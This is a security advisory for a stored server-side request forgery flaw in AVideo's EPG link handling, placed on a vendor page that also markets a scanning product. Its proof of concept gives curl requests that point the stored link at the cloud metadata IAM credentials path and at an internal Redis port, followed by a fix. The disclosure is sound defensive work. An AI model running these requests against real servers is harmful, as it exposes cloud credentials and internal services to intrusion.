GHSA-x5vx-vrpf-r45f
MEDIUMAVideo: Stored SSRF via Video EPG Link Missing isSSRFSafeURL() Validation
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
wwbn/avideoReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Summary
The EPG (Electronic Program Guide) link feature in AVideo allows authenticated users with upload permissions to store arbitrary URLs that the server fetches on every EPG page visit. The URL is validated only with PHP's FILTER_VALIDATE_URL, which accepts internal network addresses. Although AVideo has a dedicated isSSRFSafeURL() function for preventing SSRF, it is not called in this code path. This results in a stored server-side request forgery vulnerability that can be used to scan internal networks, access cloud metadata services, and interact with internal services.
Details
When a user adds or edits a video, the EPG link is stored via objects/videoAddNew.json.php:119:
$obj->setEpg_link($_POST['epg_link']);
The only validation applied is FILTER_VALIDATE_URL, which accepts URLs targeting internal addresses such as http://127.0.0.1, http://169.254.169.254, or http://10.0.0.1.
Later, when the EPG data is parsed, the stored URL is fetched server-side at objects/EpgParser.php:358:
$this->content = @\file_get_contents($this->url);
The file_get_contents() function follows redirects and supports multiple protocols including http://, https://, ftp://, and depending on PHP configuration, php:// and other stream wrappers.
The codebase contains an isSSRFSafeURL() function that validates URLs against internal network ranges, but this function is not invoked anywhere in the EPG link processing path.
Because the URL is stored in the database, every subsequent visit to the EPG page re-triggers the server-side request. This makes the SSRF persistent and repeatable without further attacker interaction.
Proof of Concept
-
Authenticate as a user with upload permissions.
-
Create or edit a video and set the EPG link to an internal target:
# Target the cloud metadata service
curl -b "PHPSESSID=USER_SESSION" \
-X POST "https://your-avideo-instance.com/objects/videoAddNew.json.php" \
-d "title=Test+Video&epg_link=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
- Trigger the EPG parser by visiting the video's EPG page, or wait for the next page load that processes EPG data:
curl -b "PHPSESSID=USER_SESSION" \
"https://your-avideo-instance.com/plugin/Live/view/Live_schedule/?videos_id=VIDEO_ID"
- To scan internal ports, set the EPG link to various internal addresses:
# Scan an internal service
curl -b "PHPSESSID=USER_SESSION" \
-X POST "https://your-avideo-instance.com/objects/videoAddNew.json.php" \
-d "title=Test+Video&epg_link=http://127.0.0.1:6379/"
- The server fetches the URL via
file_get_contents(). Response differences (timing, error messages, or returned content via EPG display) reveal whether internal services are running.
Impact
An authenticated user with upload permissions can force the AVideo server to make HTTP requests to arbitrary internal and external targets. This enables scanning of internal networks, access to cloud instance metadata (potentially exposing IAM credentials on AWS/GCP/Azure), and interaction with internal services that are not intended to be externally accessible. The stored nature of this SSRF means it re-executes on every page visit, amplifying the impact.
- CWE-918: Server-Side Request Forgery (SSRF)
- Severity: Medium
Recommended Fix
Add an isSSRFSafeURL() check before the file_get_contents() call at objects/EpgParser.php:355:
if (function_exists('isSSRFSafeURL') && !isSSRFSafeURL($this->url)) {
throw new \RuntimeException('URL blocked by SSRF protection');
}
This reuses the existing SSRF protection function that is already applied in other code paths.
Found by aisafe.io
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | wwbn/avideo | all versions | No fix |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for wwbn/avideo. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Remediation status
No patched version of wwbn/avideo has shipped for GHSA-x5vx-vrpf-r45f yet. Where your build allows, override or pin the dependency away from the vulnerable range, and apply any maintainer-recommended mitigation.
Mitigate without a patch
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-x5vx-vrpf-r45f is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-x5vx-vrpf-r45f. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-x5vx-vrpf-r45f in your dependencies?
O3 detects GHSA-x5vx-vrpf-r45f across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.